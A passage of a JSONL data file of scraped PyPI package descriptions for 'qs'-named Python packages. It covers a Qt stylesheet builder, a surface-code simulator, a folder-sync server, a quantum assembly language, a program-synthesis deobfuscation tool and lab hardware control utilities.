1, 1)], [], {\"A\": 3, \"B\": 4})"} +{"package": "qstress", "pacakge-description": "qstressA simple tool for stress testing."} +{"package": "qstring", "pacakge-description": "qstring is a Python library that allows you to create nested objects from a list\nof querystring parameters.ResourcesDocumentationBug TrackerCodeDevelopment Version"} +{"package": "qstylizer", "pacakge-description": "InstallationpipinstallqstylizerDocumentationRead the Docs.Introductionqstylizeris a python package designed to help with the construction of\nPyQt/PySide stylesheets.importPyQt5.QtWidgetsimportqstylizer.stylecss=qstylizer.style.StyleSheet()css.setValues(backgroundColor=\"green\",color=\"#F0F0F0\",marginLeft=\"2px\")css.QToolButton.setValues(border=\"1px transparent lightblue\",borderRadius=\"3px\",margin=\"1px\",padding=\"3px\")css.QToolButton.menuButton.pressed.setValues(border=\"1px solid #333333\",padding=\"5px\",backgroundColor=\"#333333\")# The following is also valid and is equivalent to the statement above.css[\"QToolButton::menu-button:pressed\"].setValues(**{\"border\":\"1px solid #333333\",\"padding\":\"5px\",\"background-color\":\"#333333\",})css.QCheckBox.disabled.backgroundColor.setValue(\"#797979\")widget=PyQt5.QtWidgets.QWidget()widget.setStyleSheet(css.toString())The stylesheet generated above looks like this when passed to setStyleSheet():* {\n color: #F0F0F0;\n margin-left: 2px;\n background-color: green;\n}\nQToolButton {\n border-radius: 3px;\n padding: 3px;\n border: 1px transparent lightblue;\n margin: 1px;\n}\nQToolButton::menu-button:pressed {\n padding: 5px;\n border: 1px solid #333333;\n background-color: #333333;\n}\nQCheckBox:disabled {\n background-color: #797979;\n}The true power comes from parsing an existing stylesheet and tweaking individual\nproperty values.importqstylizer.parsercss=qstylizer.parser.parse(\"\"\"\n QToolButton::menu-button:pressed {\n padding: 5px;\n border: 1px solid #333333;\n background-color: #333333;\n }\n QCheckBox:disabled {\n background-color: #797979;\n }\n \"\"\")css.QToolButton.menuButton.pressed.padding.setValue(\"10px\")css.QCheckBox.disabled.backgroundColor.setValue(\"#222222\")print(css.toString())Output:QToolButton::menu-button:pressed {\n padding: 10px;\n border: 1px solid #333333;\n background-color: #333333;\n}\nQCheckBox:disabled {\n background-color: #222222;\n}LicenseMIT LicenseCopyright (c) 2018 Brett LambrightPermission is hereby granted, free of charge, to any person obtaining a copy\nof this software and associated documentation files (the \u201cSoftware\u201d), to deal\nin the Software without restriction, including without limitation the rights\nto use, copy, modify, merge, publish, distribute, sublicense, and/or sell\ncopies of the Software, and to permit persons to whom the Software is\nfurnished to do so, subject to the following conditions:The above copyright notice and this permission notice shall be included in all\ncopies or substantial portions of the Software.THE SOFTWARE IS PROVIDED \u201cAS IS\u201d, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\nAUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\nLIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\nOUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\nSOFTWARE."} +{"package": "qsubr", "pacakge-description": "qsubr==========version 0.2A quick qsub job submission programqsubrusage:Themissingqsubcommand[-h][--clusterCLUSTER][--queueQUEUE][--accountACCOUNT][--nameNAME][--memMEM][--nodesNODES][--threadsTHREADS][--logLOG][--debug]commandpositionalarguments:commandAquotedstringofcommands\n\noptionalarguments:-h,--helpshowthishelpmessageandexit--clusterCLUSTER,-cCLUSTERclustersettings--queueQUEUE,-qQUEUEqueue--accountACCOUNT,-AACCOUNTaccount_string--nameNAME,-NNAMEname--memMEM,-gbMEMmemoryingigabytes--nodesNODES,-nNODESnodes--threadsTHREADS,-tTHREADSthreads--logLOG,-lLOGlogfilename--debug,-dToprintcommands(Fortestingflow).OPTIONALAcknowledgementsWritten by Scott Furlan."} +{"package": "qsubwt", "pacakge-description": "Simple wrapper for sge qsub which provides the functionality of the \"-sync\" optionpython requires: >=3.5Installgit repo (for recommend)pip install git+https://github.com/yodeng/qsubwt.gitPypipip install qsubwt -UHelp$ qsubwt -h \nSimple wrapper for sge qsub which provides the functionality of the \"-sync\" option.\n\nUsage:\n qsubwt [qsub options] script.sh\n\nVersion: xxx\nAuthor: Deng Yong\nAuthor-email: yodeng@tju.edu.cn\nHome-page: https://github.com/yodeng/qsubwt.git"} +{"package": "qsuite", "pacakge-description": "No description available on PyPI."} +{"package": "qsum", "pacakge-description": "Intuitive and extendable checksumming for python objects"} +{"package": "qsurface", "pacakge-description": "QsurfaceQsurface is a simulation package for the surface code, and is designed to modularize 3 aspects of a surface code simulation.The surface codeThe error modelThe used decoderNew types of surface codes, error modules and decoders can be added to Qsurface by using the included templates for each of the three core module categories.The current included decoders are:TheMininum-Weight Perfect Matching(mwpm) decoder.Delfosse's and Nickerson'sUnion-Find(unionfind) decoder, which hasalmost-linearworst-case time complexity.Our modification to the Union-Find decoder; theUnion-Find Node-Suspension(ufns) decoder, which improves the threshold of the Union-Find decoder to near MWPM performance, while retaining quasi-linear worst-case time complexity.The compatibility of these decoders with the included surface codes are listed below.Decoderstoriccodeplanarcodemwpm\u2705\u2705unionfind\u2705\u2705ufns\u2705\u2705InstallationAll required packages can be installed through:pipinstallqsurfaceRequirementsPython 3.7+TkinterorPyQt5for interactive plotting.Matplotlib 3.4+ for plotting on a 3D lattice (Refers to a future release of matplotlib, seepull request)MWPM decoderThe MWPM decoder utilizesnetworkxfor finding the minimal weights in a fully connected graph. This implementation is however rather slow compared to Kolmogorov'sBlossom Valgorithm. Blossom V has its own license and is thus not included with Qsurface. We do provided a single function to download and compile Blossom V, and to setup the integration with Qsurface automatically.>>>fromqsurface.decodersimportmwpm>>>mwpm.get_blossomv()UsageTo simulate the toric code and simulate with bitflip error for 10 iterations and decode with the MWPM decoder:>>>fromqsurface.mainimportinitialize,run>>>code,decoder=initialize((6,6),\"toric\",\"mwpm\",enabled_errors=[\"pauli\"])>>>run(code,decoder,iterations=10,error_rates={\"p_bitflip\":0.1}){'no_error':8}Benchmarking of decoders can be enabled by attaching abenchmarkerobject to the decoder. See the docs for the syntax and information to setup benchmarking.>>>fromqsurface.mainimportinitialize,run>>>benchmarker=BenchmarkDecoder({\"decode\":\"duration\"})>>>run(code,decoder,iterations=10,error_rates={\"p_bitflip\":0.1},benchmark=benchmarker){'no_error':8,'benchmark':{'success_rate':[10,10],'seed':12447.413636559,'durations':{'decode':{'mean':0.00244155000000319,'std':0.002170364089572033}}}}PlottingThe figures in Qsurface allows for step-by-step visualization of the surface code simulation (and if supported the decoding process). Each figure logs its history such that the user can move backwards in time to view past states of the surface (and decoder). Presshwhen the figure is open for more information.>>>fromqsurface.mainimportinitialize,run>>>code,decoder=initialize((6,6),\"toric\",\"mwpm\",enabled_errors=[\"pauli\"],plotting=True,initial_states=(0,0))>>>run(code,decoder,error_rates={\"p_bitflip\":0.1,\"p_phaseflip\":0.1},decode_initial=False)Plotting will be performed on a 3D axis if faulty measurements are enabled.>>>code,decoder=initialize((3,3),\"toric\",\"mwpm\",enabled_errors=[\"pauli\"],faulty_measurements=True,plotting=True,initial_states=(0,0))>>>run(code,decoder,error_rates={\"p_bitflip\":0.05,\"p_bitflip_plaq\":0.05},decode_initial=False)In IPython, inline images are created for each iteration of the plot, which can be tested in theexample notebook.Command line interfaceSimulations can also be initiated from the command line$python-mqsurface-epauli-Dmwpm-Ctoricsimulation--p_bitflip0.1-n10{'no_error':8}For more information on command line interface:$python-mqsurface-h\nusage:qsurface\n...This project is proudly funded by theUnitary Fund."} +{"package": "qsvin", "pacakge-description": "No description available on PyPI."} +{"package": "qs_vod_metadata", "pacakge-description": "This project contains a library and tools for manipulating and\ngenerating metadata files that conform to the CableLabs VOD Metada 1.1\nspecification"} +{"package": "qsy", "pacakge-description": "qsyA quantum computer state vector/stabilizer circuit simulator and assembly\nlanguage.Table of ContentsInstallationqsyExampleqsyASMUsageExampleSyntaxOperationsAdjoint OperationList of OperationsRegistersMeasurementEfficient simulation of stabilizer circuitsLicenseInstallation$ pip install qsyThis will install the Python library qsy and command-line tool qsyasm.qsyqsy is a Python library for simulating quantum circuits.ExampleThe following code creates an entangled state and prints its state vector in\nDirac notation.fromqsyimportQuantumRegister,gatesqr=QuantumRegister(2)qr.apply_gate(gates.H,0)qr.apply_gate(gates.CX,0,1)print(qr.to_dirac())The output will be:+0.70711|00> +0.70711|11>qsyASMqsyASM is a quantum assembly language acting as front-end for qsy. It allows\nyou to quickly write and debug quantum programs. It also allows for efficient\nsimulation of stabilizer circuits using thechpback-end.Usageusage: qsyasm [-h] [-V] [-v] [-t] [-b B] [-s SHOTS] [--ignore-print-warning]\n [--skip-zero-amplitudes]\n filename\n\nqsyasm assembly runner\n\npositional arguments:\n filename qsyasm file to execute\n\noptional arguments:\n -h, --help show this help message and exit\n -V, --version show program's version number and exit\n -v, --verbose verbose output\n -t, --time time program execution\n -b B, --backend B simulator back-end to use: chp or statevector\n (default: statevector)\n -s SHOTS, --shots SHOTS\n amount of shots to run\n --ignore-print-warning\n ignore register too large to print warning\n --skip-zero-amplitudes\n don't print states with an amplitude of 0ExampleThe following qsyASM program creates an entangled state and measures to a\nclassical register:qreg[2]qcreg[2]chq[0]cxq[0],q[1]measq,cRunning it:$ qsyasm examples/qsyasm/bell.qs\nq[2]: +1|11>\n +0 | 00\n +0 | 01\n +0 | 10\n +1 | 11\nc[2]: 11Or running it a number of times:$ qsyasm examples/qsyasm/bell.qs --shots=1024\nq[2]: +1|00>\n +1 | 00\n +0 | 01\n +0 | 10\n +0 | 11\nc[2]: {'11': 550, '00': 474}More examples such as the quantum phase estimation algorithm can be found in theexamples/qsyasmfolder.SyntaxThe structure of a qsyASM program consists of a list of instructions. An\ninstruction is defined as an operation followed by its arguments.OperationsThe instructioncxq[0],q[1]applies a CNOT operation with control qubitq[0]and target qubitq[1].\nSome operations take an angle (in radians) as argument. The parameterized operationrz(pi/2)q[0]rotatesq[0]\u03c0/2 radians around the Z axis. Expressions are allowed in\nparameterized operations. Expression operators supported are+,-,*,/and**(power). The variablepiis available for convenience.Adjoint OperationTo apply the adjoint of a gate, theadjkeyword is available. For example, to\napply the adjoint of S (S dagger):adjsq[0]List of OperationsGateqsyASM operationPauli Ii targetPauli Xx targetPauli Yy targetPauli Zz targetHadamardh targetSs targetTt targetRxrx(angle) targetRyry(angle) targetRzrz(angle) targetCNOTcx control, targetCZcz control, targetCRxcrx(angle) control, targetCRycry(angle) control, targetCRzcrz(angle) control, targetToffoliccx controlA, controlB, targetRegistersDefining a quantum register is done with theqregoperation. The instructionqreg[5]qdefines a 5 qubit quantum register namedq. Likewise, a classical register (useful for measuring) can be defined ascreg[5]cQubits in a quantum register are initiated to |0\u27e9, and bits in a classical register to 0.MeasurementMeasurement can be done on individual qubits, or a complete quantum state. The programqreg[5]qcreg[1]chq[0]measq[0],c[0]measuresq[0]toc[0], collapsing the state and storing the result inc[0]. The measurement result can be ignored by only passing one argument tomeas:measq[0]To measure a complete quantum state you can pass the whole quantum and classical register:qreg[3]qcreg[3]c; 3 qubit GHZ statehq[0]cxq[0],q[1]cxq[0],q[2]measq,ccollapsing the quantum registerqand storing the measurement result inc. This only works when the quantum register and classical register are equal in size.Efficient simulation of stabilizer circuitsCircuits consisting only of CNOT, H, S, X, Y, Z and CZ gates can be efficiently\nsimulated with the CHP back-end. Using any other operations with the CHP\nback-end will result in an error.For example, we can simulate a partially entangled 750 qubit state:$ qsyasm examples/qsyasm/750_qubits.qs --backend=chp\nc[750]: 000000000000000000000000000000000000000000000000001111111111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000This back-end is an implementation of the CHP simulator described by\nScott Aaronson and Daniel Gottesman in their paper \"Improved Simulation of Stabilizer Circuits\"\n(arXiv:quant-ph/0406196).LicenseThis project is licensed under the MIT License. See theLICENSEfile\nfor the full license."} +{"package": "qsymm", "pacakge-description": "QsymmSymmetry finder and symmetric Hamiltonian generatorqsymmis anopen-sourcePython library that makes symmetry analysis simple.It automatically generates model Hamiltonians from symmetry constraints\nand finds the full symmetry group of your Hamiltonian.Check out theintroductory tutorialto see examples of how to useqsymm.Implemented algorithmsThe two core concepts inqsymmareHamiltonian families(Hamiltonians that may depend on\nfree parameters) andsymmetries. We provide powerful classes to handle these:Modelis used to store symbolic Hamiltonians that may depend on momenta and other free parameters.\nWe usesympyfor symbolic manipulation, but our implementation utilizesnumpyarrays for\nefficient calculations with matrix valued functions.PointGroupElementandContinuousGroupGeneratorare used to store symmetry operators.\nBesides the ability to combine symmetries, they can also be applied to aModelto transform it.We implement algorithms that form a two-way connection between Hamiltonian families and symmetries.Symmetry finding is handled bysymmetries, it takes aModelas input and finds all of its symmetries,\nincluding conserved quantities, time reversal, particle-hole, and spatial rotation symmetries.\nSee thesymmetry finder tutorialand thekekule tutorialfor detailed examples.continuum_hamiltonianandbloch_familyare used to generatek.por lattice Hamiltonians\nfrom symmetry constraints. See thek-dot-p generator tutorial,\ntheBloch generator tutorialand thekekule tutorialfor detailed examples.Installationqsymmworks with Python 3.5 and is available on PyPI:pipinstallqsymmSome of the example notebooks also requireKwant.DocumentationQsymm's documentation is hosted onRead the DocsCitingCheck outCITING.mdfor instructions on how to cite Qsymm in your publications.Developmentqsymmis onGitlab, visit there if you would\nlike to to contribute, report issues, or get the latest development version."} +{"package": "qsync", "pacakge-description": "QSYNCintroductionsync_module is the simplest way to set-up a one/two ways syncronisations between folders and even between two distinct devices, from a single python script ! just use it like so :fromqsyncimportSyncIniterfromsysimportargvfrommultiprocessingimportfreeze_supportimportargparsefromqsyncimportserverdefmain():# nothing usefull, just parsing command line argsparser=argparse.ArgumentParser(description=\"\")parser.add_argument('sync_src',type=str,help='sync source directory')parser.add_argument('sync_dst',type=str,help='sync destination directory')parser.add_argument('-bd',action='store_true',help='bi directionnal mode')parser.add_argument('--force-id',type=str,help='force a specific id associated to the sync process (necessary to acces via http)')parser.add_argument('--remote',type=str,help='open sync server, specify destination ip')parser.add_argument('--loop-time',type=float,help='adjust the time between two sync (each use has it\\'s own optimal inter-loop time to avoid sync errors'))args=parser.parse_args()sync_src=args.sync_src.replace(\"\\\\\",\"/\")sync_dst=args.sync_dst.replace(\"\\\\\",\"/\")bi_d=args.bdifargs.remote:remote_ip=args.remoteremote=Trueelse:remote_ip=\"\"remote=Falseforce_id=args.force_idloop_time=args.loop_time# sync_src and sync_dst must be two strings containing two path# bi_directionnal is an optionnal boolean, default set to False# remote is an optionnal boolean, set to True if the sync_dst path is on a remote location# force_id let you specify the sync id, usefull in case of remote and/or want to keep a sync state after shutdown# loop_time let you adjust the time between two sync (each use has it\\'s own optimal inter-loop time to avoid sync errors)s=SyncIniter(sync_src,sync_dst,bi_directionnal=bi_d,remote=remote,force_id=force_id,remote_ip=remote_ip,loop_time=loop_time)s.start_sync()print(f\"started to sync, bi directionnal mode :{bi_d}, remote:{remote}\")print(f\"\\n\\nSYNC ID :\\n{s.sync_id}\\n\\n\")# start the server if the other side is on a remote machine if not already runningifremote:try:get(\"https://127.0.0.1:2121/is_running\",timeout=1,verify=False)exceptTimeoutError:server.app.run(host=\"0.0.0.0\",port=2121,ssl_context='adhoc')if__name__==\"__main__\":freeze_support()main()A cli is also available with this module :usage: __main__.py [-h] [-bd] [--force-id FORCE_ID] [--remote REMOTE] [--loop-time LOOP_TIME]\n sync_src sync_dst\n\npositional arguments:\n sync_src sync source directory\n sync_dst sync destination directory\n\noptional arguments:\n -h, --help show this help message and exit\n -bd bi directionnal mode\n --force-id FORCE_ID force a specific id associated to the sync process (necessary to acces via\n http)\n --remote REMOTE open sync server, specify destination ip\n --loop-time LOOP_TIME\n adjust the time between two sync (each use has it's own optimal inter-loop\n time to avoid sync errors)(remote sync does not need to be in real time, each device will store changes and wait the other when they can't connect to each other)Example :C:\\> python -m qsync \"D:\\test_src\" \"C:\\Users\\USER\\Documents\\test_dst\" -bd --remote \"192.168.0.64\" --force-id \"0x1bfdc4f5e421fe563476d2441980349d79c32ccae555134b3eb7a4b62f68f1e66aa574f933289edbc6043b25977b69f2c921961fd60596e4281464fc84f76d3c16df24db5c15fcf98ab071aaf6711da44efcc0024f37a0213b98e42739eb5398cf760a307149cfb58dfa5a\" --loop-time 10Errors :InvalidPathErrorraised in start_sync() when a path don't existshow qsync server works in a remote context :(Sync does not need to be in real time, each device will store changes and wait the other when they can't connect to each other)Specifications :The qsync sync server is an http server, to encrypt data it uses on-the-fly certificates.Because of these certificates, you must force whatever client you use to not verify certificates.\nfor example, qsync usesrequests.get(< args >,verify=False).This server enable a great range of uses of qsync, from mobile-to-pc folders sync at multiple-pc sync.the sync id is an hexadecimal representation of a 256 digits lenght number and must be present on any http requests, so the two sync ends must share this id. Once you got this id, to start the other sync process you need to use --force-id FORCE_ID optionnal argument. Or place it in your script as optionnal argument into the SyncIniter class :SyncIniter(< args >, remote=True, force_id=force_id, remote_ip=remote_ip)How does it make its things to syncronize :The main infinite loop make two requests :\"https://{self.sRemoteIP}:2121/remote_map\" to try to syncronize the folders map between two devices\"https://{self.sRemoteIP}:2121/sync_map\" to try to ask the other device what's new, trigger multiple requests from the other deviceThe server has 7 URLs :/is_running, to check if the server is already running/sync_map?sync_id=..., to trigger many requests that will make pending changes on your filesystem/remote_map?sync_id=..., return a JSON response containing the current filesystem map/get_file?sync_id=...&full_path=..., make you download a specific file. Full_path is the full path to get the file from the other side's filesystem (server side)./upload_file?sync_id=...&full_path=..., POST only. Upload a specific file. Full_path is thefull path to upload the file from the other side's filesystem (server side)./remove?sync_id=...&full_path=..., Suppress something. File or folder (server side)./mkdir?sync_id=...&full_path=..., Create a folder (server side). Full_path is the full path to create the folder from the other side's filesystem (server side).The server make sure each request don't tries to download/modify... things outside the root folder of your sync. If anything wrong is made, an explicit error message will be return as response. Each uploaded file's name is also checked."} +{"package": "qsync-control", "pacakge-description": "A Python library for operating QMotion blinds controlled a QSync device on the local network. The program is written in Python 3. Network protocol dissection can be found in the comments within the qsync_control.py file. Protocol details are inferred from Wireshark monitoring of the network traffic between the QMotion QSync iPhone app and the QSync device.Usage examples can be found at:https://github.com/exitexit/qsync-control"} +{"package": "qsynthesis", "pacakge-description": "QsynthesisQSynthesis is a Python3 API to perform I/O based program synthesis\nof bitvector expressions. It aims at facilitating code deobfuscation.\nThe algorithm is greybox approach combining both a blackbox I/O based\nsynthesis and a whitebox AST search to synthesize sub-expressions(if\nthe root node cannot be synthesized).This algorithm as originaly been described at the BAR academic workshop:QSynth: A Program Synthesis based Approach for Binary Code Deobfuscation(benchmark used are available:here)The code has been release as part of the following Black Hat talk:Greybox Program Synthesis: A New Approach to Attack Dataflow ObfuscationDisclaimer: This framework is experimental, and shall only be used for experimentation purposes.\nIt mainly aims at stimulating research in this area.DocumentationThe installation, examples, and API documentation is available on the dedicated documentation:DocumentationFunctionalitiesThe core synthesis is based onTritonsymbolic engine on which is built\nthe whole framework. It provides the following functionalities:synthesis of bitvector expressionsability to check through SMT the semantic equivalence of synthesized expressionsability to synthesize constants(if the expression encode a constant)ability to improve oracles (pre-computed tables) overtime through a learning mechanismability to reassemble synthesized expression back to assemblyability to serve oracles through a REST API to facilitate the synthesis usagean IDA plugin providing an integration of the synthesisQuick startInstallationIn order to work Triton first has to be installed:install documentation.\nTriton does not automatically install itself in a virtualenv, copy it in your venv or use --system-site-packages when configuring your venv.Then:$ git clone https://github.com/quarkslab/qsynthesis.git\n$ cd qsynthesis\n$ pip3 install '.[all]'The[all]will installed all dependencies(see the documentation for a light install).Table generationThe synthesis algorithm requires generating oracle tables derived from a grammar(a\nset of variables and operators). Qsynthesis installation provides the utilityqsynthesis-table-managerenabling manipulating tables. The following command generate a table with 3 variables of 64 bits,\n5 operators using a vector of 16 inputs. We limit the generation to 5 million entries.$ qsynthesis-table-manager generate -bs 64 --var-num 3 --input-num 16 --random-level 5 --ops AND,NEG,MUL,XOR,NOT --watchdog 80 --limit 5000000 my_oracle_table\nGenerate Table\nWatchdog value: 80.0\nDepth 2 (size:3) (Time:0m0.23120s)\nDepth 3 (size:21) (Time:0m0.23198s)\nDepth 4 (size:574) (Time:0m0.26068s)\nDepth 5 (size:400858) (Time:0m21.23231s)\nThreshold reached, generation interrupted\nStop required\nDepth 5 (size:5000002) (Time:4m52.56009s) [RAM:9.52Gb]Note: The generation process is RAM consuming the--watchdogenables setting a\npercentage of the RAM above which the generation is interrupted.Synthesizing a bitvector expressionWe then can try simplifying a seemingly obfuscated expression with:fromqsynthesisimportSimpleSymExec,TopDownSynthesizer,InputOutputOracleLevelDBblob=b'UH\\x89\\xe5H\\x89}\\xf8H\\x89u\\xf0H\\x89U\\xe8H\\x89M\\xe0L\\x89E\\xd8H\\x8bE'\\b'\\xe0H\\xf7\\xd0H\\x0bE\\xf8H\\x89\\xc2H\\x8bE\\xe0H\\x01\\xd0H\\x8dH\\x01H\\x8b'\\b'E\\xf8H+E\\xe8H\\x8bU\\xe8H\\xf7\\xd2H\\x0bU\\xf8H\\x01\\xd2H)\\xd0H\\x83\\xe8'\\b'\\x02H!\\xc1H\\x8bE\\xe0H\\xf7\\xd0H\\x0bE\\xf8H\\x89\\xc2H\\x8bE\\xe0H\\x01\\xd0'\\b'H\\x8dp\\x01H\\x8bE\\xf8H+E\\xe8H\\x8bU\\xe8H\\xf7\\xd2H\\x0bU\\xf8H\\x01\\xd2'\\b'H)\\xd0H\\x83\\xe8\\x02H\\t\\xf0H)\\xc1H\\x89\\xc8H\\x83\\xe8\\x01]\\xc3'# Perform symbolic execution of the instructionssymexec=SimpleSymExec(\"x86_64\")symexec.initialize_register('rip',0x40B160)# arbitrary addresssymexec.initialize_register('rsp',0x800000)# arbitrary stacksymexec.execute_blob(blob,0x40B160)rax=symexec.get_register_ast(\"rax\")# retrieve rax register expressions# Load lookup tablesltm=InputOutputOracleLevelDB.load(\"my_oracle_table\")# Perform Synthesis of the expressionsynthesizer=TopDownSynthesizer(ltm)synt_rax,simp=synthesizer.synthesize(rax)print(f\"expression:{rax.pp_str}\")print(f\"synthesized expression:{synt_rax.pp_str}[{simp}]\")Limitationssynthesis accuracy limited by pre-computed tables exhaustivnesstable generation limited by RAM consumptionreassembly cannot involve memory variable, destination is necessarily a register and\narchitecture depends on llvmlite(thus mostly x86_64)the code references trace-based synthesis which is disabled(as the underlying\nframework is not yet open-source)AuthorsRobin David (@RobinDavid), QuarkslabContributorsHuge thanks to contributors to this research:Luigi ConiglioJonathan Salwan"} +{"package": "qsys", "pacakge-description": "Python QSYS QRC WrapperControl QSC QSYS Core devices with pythonToDoFlaskify...Document, document, documentUseFor each QSC Core on the network instantiate a \"Core\" classWhen adding control objects they will \"cast\" themselves to the parent core classThe parent Core class instance is required as keyword arg \"parent\" when creating control objects#!/usr/bin/python3importtimefromqsys.classesimportCore,Control,ChangeGroup#returns epoch timefromqsys.helpersimportepochdefmain():#See qsys.py for parameters in Core class#The initiail EngineStatus response parameters from the device will get added to Core.__dict__#You can pass \"port\" as well, but it defaults to 1710myCore=Core(Name='myCore',User='',Password='',ip='192.168.61.2')#Open the socket,creates \"listen\" and \"keepalive\" threadsmyCore.start()#ValueType can be a list of potential value types [int,float] or a single type \"str\" etc#This object is assumed to be a \"gain\" control object, so we can pass [int,float]gainControlObject=Control(parent=myCore,Name='namedControlInQsysDesigner',ValueType=[int,float])#To constantly monitor the state of your object use a ChangeGroup#You need to a ChangeGroup instance to add control objects and set polling rates#Parameters that are capitalize are that way because of the QRC parameter protocol#Id in this case is just the name of the ChangeGroupmyChangeGroup=ChangeGroup(parent=myCore,Id='myChangeGroup')myChangeGroup.AddControl(gainControlObject)#Allow the socket time to connect and parse the initial responsestime.sleep(2)#Set the change group auto poll rate#This rate is fast, your mileage may varymyChangeGroup.AutoPoll(Rate=0.1)#Value = value to set object to#TransId = QRC id parameter for transaction IDgainControlObject.set(Value=10,TransId=epoch())whileTrue:print(gainControlObject.state)time.sleep(1)if__name__=='__main__':main()NotesIn development, versions will change rapidly. This version doesn't do much yet.. stand byReferenceshttps://q-syshelp.qsc.com/Content/External_Control/Q-Sys_Remote_Control/QRC.htm"} +{"package": "qt", "pacakge-description": "Failed to fetch description. HTTP Status Code: 404"} +{"package": "qt3rfsynthcontrol", "pacakge-description": "Controller for Windfreak SynthHD v2 RF GeneratorHelper code to controlWindfreak's SynthHD RF generator.Installationpip install qt3rfsynthcontrolUsageDetermine the portimportqt3rfsynthcontrolqt3rfsynthcontrol.discover_devices()Will return a list of ports and information about devices connected to those ports.\nFor example[['COM3','Intel(R) Active Management Technology - SOL (COM3)','PCI\\\\VEN_8086&DEV_43E3&SUBSYS_0A541028&REV_11\\\\3&11583659&1&B3'],['COM5','USB Serial Device (COM5)','USB VID:PID=0483:A3E5 SER=206A36705430 LOCATION=1-2:x.0'],['COM6','USB Serial Device (COM6)','USB VID:PID=04D8:000A SER= LOCATION=1-8:x.0'],['COM7','USB Serial Device (COM7)','USB VID:PID=239A:8014 SER=3B0D07C25831555020312E341A3214FF LOCATION=1-6:x.0']]It is certainly not obvious to which USB port the Windfreak is connected. However,\nusing the Windows Task Manager, as well as trial and error, should eventually\nreveal the correct serial port to use.Connection to SynthHDrf_synth=qt3rfsynthcontrol.QT3SynthHD('COM5')Hardware Inforf_synth.hw_info()Current Signal Statusrf_synth.current_status()Set Fixed Frequencychannel_A=0channel_B=1rf_synth.set_channel_fixed_output(channel_A,power=-5.0,frequency=2870e6)Set Up For Frequency ScanFrequency scan can either be triggered externally (using the Quantum Composer\nSapphire pulser, or other), or can run independent of any external control.channel_A=0channel_B=1rf_synth.set_frequency_sweep(channel_A,power=-5.0,frequency_low=2820e6,frequency_high=2920e6,n_steps=101,trigger_mode='single frequency step',frequency_sample_time=0.100)See the function's documentation for further detailshelp(rf_synth.set_frequency_sweep)Turn RF ON/OFFThe RF generation can be turned on and off withchannel_A=0channel_B=1rf_synth.rf_on(channel_A)rf_sythh.rf_off(channel_A)Windfreak.SynthHDIf you wish to use thewindfreak-pythonSynthHD object instance directly, you\ncan obtain it from the propertySynthHD. Usage ofwindfreak-python is documented here.windfreak_synthhd=rf_synth.SynthHD()print(windfreak_synthhd[0].power)print(windfreak_synthhd[0].frequency)The documentation is a little sparse, however. The full set of commands are found inthe codethe programming manualIt can take a little effort to match the python API with the description in the manual as\nsome of thewindfreak-pythonAPI functions do not exactly match the function name in the manual.\nFor examplesweep_singleinwindfreak-pythonis calledsweep_runorrun_sweepin the programming manual.LICENSELICENCE"} +{"package": "qt3utils", "pacakge-description": "Utility Classes and Functions for the QT3 LabThis package provides a number of tools and fully-packaged programs for usage\nin the Quantum Technologies Teaching and Test-Bed (QT3) lab at the University of Washington.The QT3 lab confocal microscope utilizes the following hardware to perform\nvarious spin-control experiments on quantum systems, such as NV centers in diamond:TTL pulsersQuantum Composer SapphireSpin Core PulseBlasterExcelitas SPCM for photon detectionNI-DAQ card (PCIx 6363) for data acquisition and controlJena System's Piezo Actuator Stage Control Amplifier[Future] spectrometerThe code in this package facilitates usages of these devices to perform\nexperiments.SetupPrerequisitesThe utilities in this package depend on publicly available Python packages found\non PyPI and drivers built by National Instruments for DAQmx and\nSpinCore for the PulseBlaster. These libraries must be installed separately.National Instruments DAQmxdriver downloadsSpinCore's PulseBlasterspinAPI driverInstallationOnce the prerequisite packages have been installed, qt3utils can be installed from pip.Normal Installationpip install qt3utilsTheqt3utilspackage depends on a handful of otherqt3 packagesand will be installed for you by default.\nAdditional information may also befound here.Update Tk/TclUpgrading Tcl/Tk via Anaconda overcomes some GUI bugs on Mac OS Sonomaconda install 'tk>=8.6.13'UsageThis package provides GUI applications and a Python API for controlling the hardware and running experiments.For instructions on using the python API,\nthe simplest way to get started is to see one of theexampleJupyter notebooks.The following notebooks demonstrate usage of their respective experiment classes and\nthe necessary hardware control objects for those experimentsCWODMRPulsed ODMRRabi OscillationsRamsey(similar usage for spin/Hahn echo and dynamical decoupling)Additionally, there are two notebooks that demonstrate some basic hardware testsPulse Blaster TestsMW Switch TestsMost classes and methods contain docstrings that describe functionality, which you can\ndiscover through the python help() function.Details of how the experiment classes work and how you can modify\nthem are found inExperimentsDoc.mdHelp toautomatically generate documentationwould be appreciated.ApplicationsQT3 OscilloscopeThe console programqt3scopecomes with this package. It allows you to run\na simple program from the command-line that reads the count rate on a particular\ndigital input terminal on the NI DAQ. Further development may allow it to\ndisplay count rates from other hardware.It can be from the command line / terminal> qt3scopeAfterpip install, there will be an executible file in your python environment. You\nshould be able to create a softlink to that executable to a desktop or task bar icon, allowing\nto launch the program from a mouse click.Starting in version 1.0.3, graphical dropdown menus and configuration windows\nwill allow users to configure various hardware options.YAML ConfigurationData Acquisition hardware supported by QT3Scope can also be configured by selecting a YAML file.\nThe YAML file must contain a specific structure and names as shown below.Default NIDAQ Edge Counter YAML configuration:QT3Scope:DAQController:import_path:qt3utils.applications.controllers.nidaqedgecounterclass_name:QT3ScopeNIDAQEdgeCounterControllerconfigure:daq_name:Dev1# NI DAQ Device Namesignal_terminal:PFI0# NI DAQ terminal connected to input digital TTL signalclock_terminal:# Specifies the digital input terminal to the NI DAQ to use for a clock. If left blank, interprets as None or NULLclock_rate:100000# NI DAQ clock rate in Hznum_data_samples_per_batch:1000read_write_timeout:10# timeout in seconds for 